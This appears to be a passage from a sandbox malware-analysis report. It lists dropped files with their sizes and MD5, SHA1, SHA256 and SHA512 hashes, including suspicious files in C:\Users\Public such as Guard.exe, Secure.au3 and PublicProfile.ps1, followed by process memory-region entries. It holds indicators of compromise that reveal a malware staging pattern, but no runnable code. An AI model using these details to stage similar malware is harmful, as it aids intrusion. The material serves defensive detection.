                                                834KB

                                                MD5

                                                41cc6ba3d0fac02e1c2821cf33b3c230

                                                SHA1

                                                4df8841809f421108f8e3489f40ba5ce6f2a0ab9

                                                SHA256

                                                e3b15f0b66a7d8e23bfeb9f3a77dea4402882c35afae41b5115daf21f258b71f

                                                SHA512

                                                2f05a0af68bdcbf7cf842046fb013c560bbe1d0a16967df00ea9bf0c6fdeda7098165fc6e8b7e4aaebacdcaceacb9c1b1728f7e42bd3a0a9b46ce58a19c26686

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\811b28e9-7c4f-4802-9b03-e17434b95142.dmp

                                                Filesize

                                                834KB

                                                MD5

                                                b42e469e73b1bbf16d386aba57e75d4b

                                                SHA1

                                                0887d27e91374542808538dcf50124af9b0cbea3

                                                SHA256

                                                5d20d8d41d9cda5ec6827fbea4a8f871c3c26ac59d089b7197c3b423bd7bb265

                                                SHA512

                                                281f16c44c8490d0d55f82cf85b4b912165b83af231d54cd61c8a433df4773398c22e39428150c77d90ed15e5b6496852d7fc24f35bf6c4834249ac3a33da646

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\b157631b-25ab-4cb1-88d8-5121fc026ce5.dmp

                                                Filesize

                                                817KB

                                                MD5

                                                fa5055f7ebf31d7e04edda8d5ac5a2a5

                                                SHA1

                                                143780105d28c7b8fc352e3e4d655432b1420a4e

                                                SHA256

                                                72e04a01a333eea0dd1201371b962d4532b01332beed066916b624d8f856d501

                                                SHA512

                                                714576e1b058b6c0a93fa1c289099e5990b391079a68c3a6d72d10c7d171aac33c81598d42c7a358aafe5007966ebbb6cc5afa818c7f9350a5a4b9d1874ff901

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\c0349edb-5cf8-4250-bcb3-4c2730b61923.dmp

                                                Filesize

                                                834KB

                                                MD5

                                                85d94c8ca06c43eb8027df179103e9a3

                                                SHA1

                                                77140ff50929e6018f6fdce42d5f681b01b65ee7

                                                SHA256

                                                ae97ce097f369e85530fb50563af77c2a5a8583ddff52ec23225878e6231e4bd

                                                SHA512

                                                28c132cb495c92a8dac1f6106a7009f9e4ef29f1700e29b17c1b3b02faeec0c0e23b9f3df42fb13ee55166dfef3dee971d0639cee15b1e508306668d6bf2bcca

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                Filesize

                                                152B

                                                MD5

                                                d22073dea53e79d9b824f27ac5e9813e

                                                SHA1

                                                6d8a7281241248431a1571e6ddc55798b01fa961

                                                SHA256

                                                86713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6

                                                SHA512

                                                97152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                Filesize

                                                152B

                                                MD5

                                                bffcefacce25cd03f3d5c9446ddb903d

                                                SHA1

                                                8923f84aa86db316d2f5c122fe3874bbe26f3bab

                                                SHA256

                                                23e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405

                                                SHA512

                                                761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                Filesize

                                                152B

                                                MD5

                                                c3d0e5ced5ba1a81d4ca851e57fa80fb

                                                SHA1

                                                daeecbfdf1fa02226d5657a98901272289c7242c

                                                SHA256

                                                a6c6348b037db5f8a04271f707e7c9575ca4518488be3f8160acc07f69680c55

                                                SHA512

                                                0a00e10b14889f19fbab6d8484c4253e459452d55f4d92890dfbc0e74574c6f59adbf9de0f35390395274309d91eed29edbf7d47a4324b6b2969e2d347d2575e

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                Filesize

                                                152B

                                                MD5

                                                bfe9572b76baa3740042f9b48e2e52e2

                                                SHA1

                                                f95b9ed2387c4cad1a94f7aa545a9f8950ffe9cd

                                                SHA256

                                                17496d0eafebc12bda1bee1297085b38faf596e5dca4fbfbbeb150bfb0eba72a

                                                SHA512

                                                9c400f2d3e936fcbb88405e6ca126a41250f0f92b8cad416e91e19ac4d31dca06c6cb86cf14fbbd183dc35c8582252fc659df2daff77bced736fa964e8e7302c

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                Filesize

                                                152B

                                                MD5

                                                46897ea2b60844e7ef181868998812e4

                                                SHA1

                                                a7de4036509337a5ec9d86b0dac7bb4c0aa876b0

                                                SHA256

                                                c2de5ab696d118f3507a7b15a588368df61f3cee297802c161d6dbeb7ae4b050

                                                SHA512

                                                964cf25af35e1040b0a160bbf1dec8cc1deec0deeaf2771f331309badf76d9096284e47be7acbb5b2098e0f3614aaa692e5145e26db55f521fed8c465bfd06a5

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                Filesize

                                                5KB

                                                MD5

                                                c350d35a6cdfede905d9491bb74356fe

                                                SHA1

                                                242946d678a44a5fa6938d2666169cefa771043b

                                                SHA256

                                                0285ef05abb7cefcbf46f9ae396f597fceb5d01bc7c38c3018df22d844069657

                                                SHA512

                                                ba17e6c9e90a25744de2f170cd1bfb1f236bc5590cbf37a41984667116d571154714038045fc17e0eba30b8f9cfd101270b298e3c0a3c6dc9a4663cadf4d07c1

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

                                                Filesize

                                                264KB

                                                MD5

                                                f50f89a0a91564d0b8a211f8921aa7de

                                                SHA1

                                                112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                SHA256

                                                b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                SHA512

                                                bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                1KB

                                                MD5

                                                a2b24af1492f112d2e53cb7415fda39f

                                                SHA1

                                                dbfcee57242a14b60997bd03379cc60198976d85

                                                SHA256

                                                fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073

                                                SHA512

                                                9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nzjsvers.wh0.ps1

                                                Filesize

                                                60B

                                                MD5

                                                d17fe0a3f47be24a6453e9ef58c94641

                                                SHA1

                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                SHA256

                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                SHA512

                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                              • C:\Users\Public\Guard.exe

                                                Filesize

                                                872KB

                                                MD5

                                                18ce19b57f43ce0a5af149c96aecc685

                                                SHA1

                                                1bd5ca29fc35fc8ac346f23b155337c5b28bbc36

                                                SHA256

                                                d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd

                                                SHA512

                                                a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558

                                              • C:\Users\Public\PublicProfile.ps1

                                                Filesize

                                                367B

                                                MD5

                                                65405b53d7734aba2bc7176af3bc406a

                                                SHA1

                                                3edc0caf6f9d845283b33c6362e2bf78b6792d5d

                                                SHA256

                                                d63adba09c8936c086abe866006a0914716f66bbeebf08e20d63ea7ef8dca32b

                                                SHA512

                                                7aeff31ef719dd751a734cb1fafbd58f05c987f959519e43ffecb3f5ddfb64982b5deb8b355021298d4beee07150b1d4bf55d73defc1a173cde526f3abb4a9c2

                                              • C:\Users\Public\Secure.au3

                                                Filesize

                                                4.4MB

                                                MD5

                                                1e388a35beee631c9e12d71e8bc79528

                                                SHA1

                                                77571813bff175b0fc88305f3b6c9e4adf7c9ac6

                                                SHA256

                                                5ca0f2fd860b495bf2651853c1867e83b53643d06f4021c0e878a2682b2348e7

                                                SHA512

                                                21e27f60ab65074f31aa2a6d8bab065a8d95de283dcb3a7fdb632682ba3a610b6b7637af2343ec2673a402ed7d821cfb9e1433ab1636716e3a8fb947b07fceb3

                                              • C:\Users\Public\jsc.exe

                                                Filesize

                                                46KB

                                                MD5

                                                94c8e57a80dfca2482dedb87b93d4fd9

                                                SHA1

                                                5729e6c7d2f5ab760f0093b9d44f8ac0f876a803

                                                SHA256

                                                39e87f0edcdd15582cfefdfab1975aadd2c7ca1e3a5f07b1146ce3206f401bb5

                                                SHA512

                                                1798a3607b2b94732b52de51d2748c86f9453343b6d8a417e98e65ddb38e9198cdcb2f45bf60823cb429b312466b28c5103c7588f2c4ef69fa27bfdb4f4c67dc

                                              • memory/2612-12-0x00007FFA20940000-0x00007FFA21401000-memory.dmp

                                                Filesize

                                                10.8MB

                                              • memory/2612-16-0x00007FFA20940000-0x00007FFA21401000-memory.dmp

                                                Filesize

                                                10.8MB

                                              • memory/2612-0-0x00007FFA20943000-0x00007FFA20945000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/2612-11-0x00007FFA20940000-0x00007FFA21401000-memory.dmp

                                                Filesize

                                                10.8MB

                                              • memory/2612-1-0x00000218578F0000-0x0000021857912000-memory.dmp

                                                Filesize

                                                136KB

                                              • memory/2728-56-0x0000000000400000-0x0000000000700000-memory.dmp

                                                Filesize

                                                3.0MB

                                              • memory/2728-446-0x0000000000400000-0x0000000000700000-memory.dmp

                                                Filesize

                                                3.0MB

                                              • memory/2728-136-0x0000000000400000-0x0000000000700000-memory.dmp

                                                Filesize

                                                3.0MB

                                              • memory/2728-130-0x0000000000400000-0x0000000000700000-memory.dmp

                                                Filesize

                                                3.0MB

                                              • memory/2728-129-0x0000000000400000-0x0000000000700000-memory.dmp

                                                Filesize

                                                3.0MB

                                              • memory/2728-479-0x0000000000400000-0x0000000000700000-memory.dmp

                                                Filesize

                                                3.0MB

                                              • memory/2728-78-0x000000001C1B0000-0x000000001C40F000-memory.dmp

                                                Filesize

                                                2.4MB

                                              • memory/2728-478-0x0000000000400000-0x0000000000700000-memory.dmp

                                                Filesize

                                                3.0MB

                                              • memory/2728-77-0x0000000000400000-0x0000000000700000-memory.dmp

                                                Filesize

                                                3.0MB

                                              • memory/2728-76-0x0000000000400000-0x0000000000700000-memory.dmp

                                                Filesize

                                                3.0MB

                                              • memory/2728-58-0x0000000000400000-0x0000000000700000-memory.dmp

                                                Filesize

                                                3.0MB

                                              • memory/2728-283-0x0000000000400000-0x0000000000700000-memory.dmp

                                                Filesize

                                                3.0MB

                                              • memory/2728-471-0x0000000000400000-0x0000000000700000-memory.dmp

                                                Filesize

                                                3.0MB

                                              • memory/2728-54-0x0000000000400000-0x0000000000700000-memory.dmp

                                                Filesize

                                                3.0MB

                                              • memory/2728-470-0x0000000000400000-0x0000000000700000-memory.dmp

                                                Filesize

                                                3.0MB

                                              • memory/2728-137-0x0000000000400000-0x0000000000700000-memory.dmp

                                                Filesize

                                                3.0MB

                                              • memory/2728-445-0x0000000000400000-0x0000000000700000-memory.dmp

                                                Filesize

                                                3.0MB

                                              • memory/2728-439-0x0000000000400000-0x0000000000700000-memory.dmp

                                                Filesize

                                                3.0MB

                                              • memory/3180-51-0x00000000059D0000-0x0000000005A6C000-memory.dmp

                                                Filesize

                                                624KB

                                              • memory/3180-52-0x0000000005D80000-0x0000000005F20000-memory.dmp

                                                Filesize

                                                1.6MB

                                              • memory/3180-48-0x0000000001200000-0x00000000013DC000-memory.dmp

                                                Filesize

                                                1.9MB

                                              • memory/3180-53-0x00000000059B0000-0x00000000059D2000-memory.dmp

                                                Filesize

                                                136KB

                                              • memory/5000-37-0x00007FFA20940000-0x00007FFA21401000-memory.dmp

                                                Filesize

                                                10.8MB

                                              • memory/5000-30-0x00007FFA20940000-0x00007FFA21401000-memory.dmp

                                                Filesize

                                                10.8MB

                                              • memory/5000-29-0x00007FFA20940000-0x00007FFA21401000-memory.dmp

                                                Filesize

                                                10.8MB

                                              • memory/5000-24-0x00007FFA20940000-0x00007FFA21401000-memory.dmp

                                                Filesize

                                                10.8MB